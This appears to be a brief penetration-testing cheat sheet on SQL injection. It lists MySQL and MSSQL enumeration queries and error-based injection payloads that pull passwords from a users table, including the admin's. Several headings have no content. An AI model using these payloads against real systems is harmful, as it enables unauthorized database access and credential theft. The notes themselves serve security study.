SQL Injection
Mysql
select version();
select system_user();
show databases;MSSQL
SELECT @@version;
SELECT name FROM sys.databases;
SELECT * FROM offsec.information_schema.tables;
select * from offsec.dbo.users;Manual Exploitation
Error-Based
' or 1=1 in (select @@version) -- //
' OR 1=1 in (SELECT * FROM users) -- //
' or 1=1 in (SELECT password FROM users) -- //
' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //Union-Based
Blind
Manual Code Execution
MSSQL Code Execution
MySQL Code Execution
Last updated